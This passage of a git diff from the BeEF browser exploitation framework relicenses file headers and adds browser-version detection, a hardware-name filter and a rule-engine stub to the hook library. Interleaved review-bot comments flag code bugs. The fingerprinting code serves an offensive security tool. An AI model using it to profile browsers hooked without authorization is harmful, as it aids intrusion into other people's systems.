Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/network_stack/assethandler.rb b/core/api/main/network_stack/assethandler.rb index d2dffe0dd..04d96c1c9 100644 
--- a/core/api/main/network_stack/assethandler.rb +++ b/core/api/main/network_stack/assethandler.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/server.rb b/core/api/main/server.rb index 026a1ac5c..7ff96ff24 100644 --- a/core/api/main/server.rb +++ b/core/api/main/server.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API 
diff --git a/core/api/main/server/hook.rb b/core/api/main/server/hook.rb index cb34f5244..b6229c46b 100644 --- a/core/api/main/server/hook.rb +++ b/core/api/main/server/hook.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/module.rb b/core/api/module.rb index 5bbfc344d..a699e915f 100644 --- a/core/api/module.rb +++ b/core/api/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API 
diff --git a/core/api/modules.rb b/core/api/modules.rb index 1ee8b1a38..22edb88e5 100644 --- a/core/api/modules.rb +++ b/core/api/modules.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/bootstrap.rb b/core/bootstrap.rb index 0ae748c22..4244f20db 100644 --- a/core/bootstrap.rb +++ b/core/bootstrap.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core 
@@ -50,6 +40,7 @@ require 'core/hbmanager' ## @note Include RESTful API require 'core/main/rest/handlers/hookedbrowsers' require 'core/main/rest/handlers/modules' +require 'core/main/rest/handlers/categories' require 'core/main/rest/handlers/logs' require 'core/main/rest/handlers/admin' require 'core/main/rest/api' diff --git a/core/core.rb b/core/core.rb index dc554314b..2adf0c1cb 100644 --- a/core/core.rb +++ b/core/core.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -34,6 +24,7 @@ require 'core/main/constants/browsers' require 'core/main/constants/commandmodule' require 'core/main/constants/distributedengine' require 'core/main/constants/os' +require 'core/main/constants/hardware' # @note Include core modules for beef require 'core/main/configuration' diff --git a/core/extension.rb b/core/extension.rb index 7b52fe344..3c7f8dd16 100644 --- a/core/extension.rb +++ b/core/extension.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/core/extensions.rb b/core/extensions.rb index f5f2026f2..5b0c0390c 100644 --- a/core/extensions.rb +++ b/core/extensions.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extensions diff --git a/core/filters.rb b/core/filters.rb index 1522bb250..be9eda17e 100644 --- a/core/filters.rb +++ b/core/filters.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/base.rb b/core/filters/base.rb index 14492577b..8b932696a 100644 --- a/core/filters/base.rb +++ b/core/filters/base.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/browser.rb b/core/filters/browser.rb index f955fb6f6..af1e3932c 100644 --- a/core/filters/browser.rb +++ b/core/filters/browser.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters @@ -47,6 +37,16 @@ module Filters true end + # Check the Hardware name value - for example, 'iPhone' + # @param [String] str String for testing + # @return [Boolean] If the string has valid Hardware name characters + def self.is_valid_hwname?(str) + return false if not is_non_empty_string?(str) + return false if has_non_printable_char?(str) + return false if str.length < 2 + true + end + # Verify the browser version string is valid # @param [String] str String for testing # @return [Boolean] If the string has valid browser version characters diff --git a/core/filters/command.rb b/core/filters/command.rb index dcb779a8b..fbff0b977 100644 --- a/core/filters/command.rb +++ b/core/filters/command.rb 
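Review bot: `is_valid_hwname?` in the second hunk accepts any printable string of two or more characters, so it has no upper length bound and no character allowlist, although its doc comment promises a check for "valid Hardware name characters". The value presumably originates from the hooked browser and should be treated as untrusted before it is stored or displayed. I would add a bound such as `return false if str.length > 64` (the limit is a constructed example; choose one that fits the known hardware names). The `@return` line should be reworded to describe what is actually checked: non-empty, printable, at least two characters.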
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/http.rb b/core/filters/http.rb index 74e316d03..b34ee47d8 100644 --- a/core/filters/http.rb +++ b/core/filters/http.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/page.rb b/core/filters/page.rb index b75852f18..354e10877 100644 --- a/core/filters/page.rb +++ b/core/filters/page.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/hbmanager.rb b/core/hbmanager.rb index cd5eb8bc0..caea676de 100644 --- a/core/hbmanager.rb +++ b/core/hbmanager.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module HBManager diff --git a/core/loader.rb b/core/loader.rb index 3ba04c62f..4a947536c 100644 --- a/core/loader.rb +++ b/core/loader.rb 
@@ -1,17 +1,8 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. # @note Include here all the gems we are using require 'rubygems' diff --git a/core/main/client/are.js b/core/main/client/are.js new file mode 100644 index 000000000..fbb6e53e3 --- /dev/null +++ b/core/main/client/are.js @@ -0,0 +1,16 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.are = { + init:function(){ + var Jools = require('jools'); + this.ruleEngine = new Jools(); + }, + rules:[], + commands:[], + results:[] +}; +beef.regCmp("beef.are"); \ No newline at end of file diff --git a/core/main/client/beef.js b/core/main/client/beef.js index b580c936c..41fab94a9 100644 --- a/core/main/client/beef.js +++ b/core/main/client/beef.js 
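Review bot: The new `core/main/client/are.js` has no comment saying what `beef.are` is for, and `init()` calls `require('jools')`, which only works if a CommonJS-style `require` is defined in the hooked page before `init()` runs; nothing in this file provides one. I would add a header above the object, e.g. `// beef.are: holds rules, commands and results; init() needs a global require() that resolves 'jools'.`, and have `init()` check `typeof require` so that a missing loader gives a clear error rather than a ReferenceError. The file also ends without a trailing newline.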
@@ -1,27 +1,16 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * BeEF JS Library <%= @beef_version %> - * http://beef.googlecode.com/ + * Register the BeEF JS on the window object. */ $j = jQuery.noConflict(); -//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>'; - if(typeof beef === 'undefined' && typeof window.beef === 'undefined') { var BeefJS = { diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 762072108..cb32204dc 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * @literal object: beef.browser * @@ -60,12 +51,22 @@ beef.browser = { return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance; }, + /** + * + * Returns true if IE10. + * @example: beef.browser.isIE10() + */ + // placeholder + isIE10: function() { + return false; + }, + /** * Returns true if IE. * @example: beef.browser.isIE() */ isIE: function() { - return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9(); + return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10(); }, /** 
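Review bot: `isIE10()` in the second hunk always returns `false`, yet it is wired into `isIE()` here and into the type map and the version lookup later in the diff, so the `IE10` entries can never be true. The stray `// placeholder` line sits between the doc block and the function and does not say what is missing. I would move that information into the doc block, e.g. `* TODO: stub - IE10 detection is not implemented, always returns false.`, and change "Returns true if IE10." accordingly so callers do not rely on it.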
@@ -180,12 +181,44 @@ beef.browser = { return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null; }, + /** + * Returns true if FF14 + * @example: beef.browser.isFF14() + */ + isFF14: function() { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null; + }, + + /** + * Returns true if FF15 + * @example: beef.browser.isFF15() + */ + isFF15: function() { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null; + }, + + /** + * Returns true if FF16 + * @example: beef.browser.isFF16() + */ + isFF16: function() { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null; + }, + + /** + * Returns true if FF17 + * @example: beef.browser.isFF17() + */ + isFF17: function() { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null; + }, + /** * Returns true if FF. * @example: beef.browser.isFF() */ isFF: function() { - return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13(); + return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17(); }, /** 
@@ -193,7 +226,7 @@ beef.browser = { * @example: beef.browser.isS4() */ isS4: function() { - return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); + return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); }, /** @@ -201,7 +234,15 @@ beef.browser = { * @example: beef.browser.isS5() */ isS5: function() { - return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); + return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); + }, + + /** + * Returns true if Safari 6.xx + * @example: beef.browser.isS6() + */ + isS6: function() { + return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); }, /** @@ -209,7 +250,7 @@ beef.browser = { * @example: beef.browser.isS() */ isS: function() { - return this.isS4() || this.isS5() || (!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); + return this.isS4() || this.isS5() || this.isS6(); }, /** 
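Review bot: The rewritten `isS()` in the third hunk on this line drops the generic fallback `(!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome)` and now matches only Safari 4, 5 and 6, so any other Safari version is no longer reported as Safari. A later context line in this diff, `if (beef.browser.isC() || beef.browser.isS())`, relies on `isS()` for a Safari-specific workaround, which those versions would now skip. If the fallback was removed because it matched non-Safari browsers, a version-independent test could be kept with the new `!("MozWebSocket" in window)` guard added to it. Otherwise the limit should be stated on the function, e.g. `// Only Safari 4.x-6.x are detected; other versions return false.`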
@@ -332,12 +373,44 @@ beef.browser = { return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false); }, + /** + * Returns true if Chrome 20. + * @example: beef.browser.isC20() + */ + isC20: function() { + return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==20)?true:false); + }, + + /** + * Returns true if Chrome 21. + * @example: beef.browser.isC21() + */ + isC21: function() { + return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false); + }, + + /** + * Returns true if Chrome 22. + * @example: beef.browser.isC22() + */ + isC22: function() { + return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==22)?true:false); + }, + + /** + * Returns true if Chrome 23. + * @example: beef.browser.isC23() + */ + isC23: function() { + return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==23)?true:false); + }, + /** * Returns true if Chrome. * @example: beef.browser.isC() */ isC: function() { - return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19(); + return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23(); }, /** 
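Review bot: The new checks `isC20()` to `isC23()` index the result of `window.navigator.appVersion.match(/Chrome\/(\d+)\./)` with `[1]` without testing it for `null`, so in a browser that exposes `window.chrome` but has no `Chrome/N.` token in `appVersion` the call throws instead of returning false. The same pattern is already in the `isC19()` context line, and the trailing `?true:false` is redundant in all of them. A small shared helper that returns the parsed major version or `null` removes both issues and the per-version copies; the helper name below is a suggestion, not an existing member.

```javascript
// Major Chrome version parsed from appVersion, or null when the token is absent.
chromeMajor: function() {
    var m = window.navigator.appVersion.match(/Chrome\/(\d+)\./);
    return m ? parseInt(m[1], 10) : null;
},

isC20: function() {
    return !!window.chrome && !window.webkitPerformance && this.chromeMajor() === 20;
},
// … isC21, isC22 and isC23 follow the same shape …
// … unchanged: isC() aggregate …
```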
@@ -372,12 +445,20 @@ beef.browser = { return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null)); }, + /** + * Returns true if Opera 12.xx. + * @example: beef.browser.isO12() + */ + isO12: function() { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null)); + }, + /** * Returns true if Opera. * @example: beef.browser.isO() */ isO: function() { - return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11(); + return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12(); }, /** @@ -401,9 +482,13 @@ beef.browser = { C14: this.isC14(), // Chrome 14 C15: this.isC15(), // Chrome 15 C16: this.isC16(), // Chrome 16 - C17: this.isC17(), // Chrome 17 + C17: this.isC17(), // Chrome 17 C18: this.isC18(), // Chrome 18 C19: this.isC19(), // Chrome 19 + C20: this.isC20(), // Chrome 20 + C21: this.isC21(), // Chrome 21 + C22: this.isC22(), // Chrome 22 + C23: this.isC23(), // Chrome 23 C: this.isC(), // Chrome any version FF2: this.isFF2(), // Firefox 2 
@@ -420,22 +505,29 @@ beef.browser = { FF11: this.isFF11(), // Firefox 11 FF12: this.isFF12(), // Firefox 12 FF13: this.isFF13(), // Firefox 13 + FF14: this.isFF14(), // Firefox 14 + FF15: this.isFF15(), // Firefox 15 + FF16: this.isFF16(), // Firefox 16 + FF17: this.isFF17(), // Firefox 17 FF: this.isFF(), // Firefox any version IE6: this.isIE6(), // Internet Explorer 6 IE7: this.isIE7(), // Internet Explorer 7 IE8: this.isIE8(), // Internet Explorer 8 IE9: this.isIE9(), // Internet Explorer 9 + IE10: this.isIE10(), // Internet Explorer 10 IE: this.isIE(), // Internet Explorer any version O9_52: this.isO9_52(), // Opera 9.50 through 9.52 O9_60: this.isO9_60(), // Opera 9.60 through 9.64 O10: this.isO10(), // Opera 10.xx O11: this.isO11(), // Opera 11.xx + O12: this.isO12(), // Opera 11.xx O: this.isO(), // Opera any version S4: this.isS4(), // Safari 4.xx S5: this.isS5(), // Safari 5.xx + S6: this.isS6(), // Safari 6.x S: this.isS() // Safari any version } }, @@ -460,11 +552,15 @@ beef.browser = { if (this.isC14()) { return '14' }; // Chrome 14 if (this.isC15()) { return '15' }; // Chrome 15 if (this.isC16()) { return '16' }; // Chrome 16 - if (this.isC17()) { return '17' }; // Chrome 17 - if (this.isC18()) { return '18' }; // Chrome 18 - if (this.isC19()) { return '19' }; // Chrome 19 + if (this.isC17()) { return '17' }; // Chrome 17 + if (this.isC18()) { return '18' }; // Chrome 18 + if (this.isC19()) { return '19' }; // Chrome 19 + if (this.isC20()) { return '20' }; // Chrome 20 + if (this.isC21()) { return '21' }; // Chrome 21 + if (this.isC22()) { return '22' }; // Chrome 22 + if (this.isC23()) { return '23' }; // Chrome 23 - if (this.isFF2()) { return '2' }; // Firefox 2 + if (this.isFF2()) { return '2' }; // Firefox 2 if (this.isFF3()) { return '3' }; // Firefox 3 if (this.isFF3_5()) { return '3.5'}; // Firefox 3.5 if (this.isFF3_6()) { return '3.6'}; // Firefox 3.6 
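Review bot: The comment on the added `O12` entry in the first hunk reads `// Opera 11.xx`, copied from the line above; it should be `O12: this.isO12(), // Opera 12.xx`. The same slip is in the version-lookup hunk on the next line of the diff, where `if (this.isS6()) { return '6' };` is labelled `// Safari 5` and should read `// Safari 6`. Both enclosing functions start outside their hunks.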
@@ -478,19 +574,26 @@ beef.browser = { if (this.isFF11()) { return '11' }; // Firefox 11 if (this.isFF12()) { return '12' }; // Firefox 12 if (this.isFF13()) { return '13' }; // Firefox 13 + if (this.isFF14()) { return '14' }; // Firefox 14 + if (this.isFF15()) { return '15' }; // Firefox 15 + if (this.isFF16()) { return '16' }; // Firefox 16 + if (this.isFF17()) { return '17' }; // Firefox 17 if (this.isIE6()) { return '6' }; // Internet Explorer 6 if (this.isIE7()) { return '7' }; // Internet Explorer 7 if (this.isIE8()) { return '8' }; // Internet Explorer 8 if (this.isIE9()) { return '9' }; // Internet Explorer 9 + if (this.isIE10()) { return '10' }; // Internet Explorer 10 if (this.isS4()) { return '4' }; // Safari 4 if (this.isS5()) { return '5' }; // Safari 5 + if (this.isS6()) { return '6' }; // Safari 5 if (this.isO9_52()) { return '9.5'}; // Opera 9.5x if (this.isO9_60()) { return '9.6'}; // Opera 9.6 if (this.isO10()) { return '10' }; // Opera 10.xx if (this.isO11()) { return '11' }; // Opera 11.xx + if (this.isO12()) { return '12' }; // Opera 12.xx return 'UNKNOWN'; // Unknown UA }, 
